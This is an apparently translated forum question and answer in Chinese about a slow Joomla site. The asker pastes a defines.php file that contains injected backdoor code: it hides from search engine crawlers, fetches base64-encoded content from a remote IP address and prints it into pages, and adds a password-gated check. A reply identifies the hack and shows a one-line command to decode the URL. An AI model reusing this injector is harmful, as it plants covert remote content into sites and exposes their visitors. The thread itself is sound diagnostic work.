经过数周徒劳的努力试图修复我的 joomla 页面加载时间,我终于将问题追踪到一个名为的 cookie:
_PHP_SESSION_PHP
content: 321
send for: any type of connection
http only: no
path: /
如果我有这个cookie,那么页面将在3秒内加载。 如果我删除此cookie,则页面将在13秒内加载,而其他页面将在3秒内再次加载,因为cookie已返回。
问题仍然存在:等待cookie太长了,而Facebook URL抓取等其他服务将在10秒后超时,然后才能收到任何页面内容。
我是一个GUI极客,对代码和终端非常胆怯和缓慢。
我相信如果cookie设置为仅http,那么Facebook不会花时间尝试抓取我的网址,因为它使用curl。谁能确认这是否是正确的方法,以及我将如何在我的脚本中找到和更改它?
此外,我认为我的页面需要 10 秒才能确定用户没有 cookie 是可疑的。这其中的原因可能是什么?
我能找到的唯一关于这个饼干的提及是在我的 mysite.com/includes/defines.php
$cookie_name = '_PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
$url = base64_decode("aHR0cDovLzE3OC4zMy4yMDAuMTczL2Jsb2cvP21hcmlqdWFuYSZ1dG1fc291cmNlPTExNTQ5OjU5ODAwMDo3NTQ=");
$code = request_url_data($url);
// if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
$echo_done = true;
print $decoded;
}
Apache 2 PHP 5.5 Joomla 3.4 CentOS 6
完整文件:
<?php
/**
* @package Joomla.Site
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
defined('_JEXEC') or die;
// Global definitions
$parts = explode(DIRECTORY_SEPARATOR, JPATH_BASE);
// Defines.
define('JPATH_ROOT', implode(DIRECTORY_SEPARATOR, $parts));
define('JPATH_SITE', JPATH_ROOT);
define('JPATH_CONFIGURATION', JPATH_ROOT);
define('JPATH_ADMINISTRATOR', JPATH_ROOT . DIRECTORY_SEPARATOR . 'administrator');
define('JPATH_LIBRARIES', JPATH_ROOT . DIRECTORY_SEPARATOR . 'libraries');
define('JPATH_PLUGINS', JPATH_ROOT . DIRECTORY_SEPARATOR . 'plugins');
define('JPATH_INSTALLATION', JPATH_ROOT . DIRECTORY_SEPARATOR . 'installation');
define('JPATH_THEMES', JPATH_BASE . DIRECTORY_SEPARATOR . 'templates');
define('JPATH_CACHE', JPATH_BASE . DIRECTORY_SEPARATOR . 'cache');
define('JPATH_MANIFESTS', JPATH_ADMINISTRATOR . DIRECTORY_SEPARATOR . 'manifests');
//istart
function request_url_data($url) {
$site_url = (preg_match('/^https?:///i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
'Referer: ' . $site_url,
));
$response = trim(curl_exec($ch));
} elseif (function_exists('fsockopen')) {
$m = parse_url($url);
if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "rn" .
'Host: ' . $m['host'] . "rn" .
'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "rn" .
'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "rn" .
'Referer: ' . $site_url . "rn" .
'Connection: Close' . "rnrn");
$response = '';
while (!feof($fp)) {
$response .= fgets($fp, 1024);
}
list($headers, $response) = explode("rnrn", $response);
fclose($fp);
}
} else {
$response = 'curl_init and fsockopen disabled';
}
return $response;
}
error_reporting(0);
$_passssword = "83f3dd053ea030f23e91df313d65eb81";
if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
echo('<!--checker_start ');
$tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
echo(substr($tmp, 50));
echo(' checker_end-->');
}
unset($_passssword);
$bad_url = false;
foreach (array('/.css$/', '/.swf$/', '/.ashx$/', '/.docx$/', '/.doc$/', '/.xls$/', '/.xlsx$/', '/.xml$/', '/.jpg$/', '/.pdf$/', '/.png$/', '/.gif$/', '/.ico$/', '/.js$/', '/.txt$/', '/ajax/', '/cron.php$/', '/wp-login.php$/', '//wp-includes//', '//wp-admin/', '//admin//', '//wp-content//', '//administrator//', '/phpmyadmin/i', '/xmlrpc.php/', '//feed//') as $regex) {
if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
$bad_url = true;
break;
}
}
$cookie_name = '_PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
$url = base64_decode("aHR0cDovLzE3OC4zMy4yMDAuMTczL2Jsb2cvP21hcmlqdWFuYSZ1dG1fc291cmNlPTExNTQ5OjU5ODAwMDo3NTQ=");
$code = request_url_data($url);
// if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
$echo_done = true;
print $decoded;
}
}//iend
您是否尝试过解码代码中的base64_encode抓取?它基本上说:你被黑客入侵了...
在终端窗口中尝试此操作(一行):
php -r 'echo base64_decode("aHR0cDovLzE3OC4zMy4yMDAuMTczL2Jsb2cvP21hcmlqdWFuYSZ1dG1fc291cmNlPTExNTQ5OjU5ODAwMDo3NTQ=");echo "n";'
出来的是抓斗的内容。这也是您的网站加载缓慢的原因。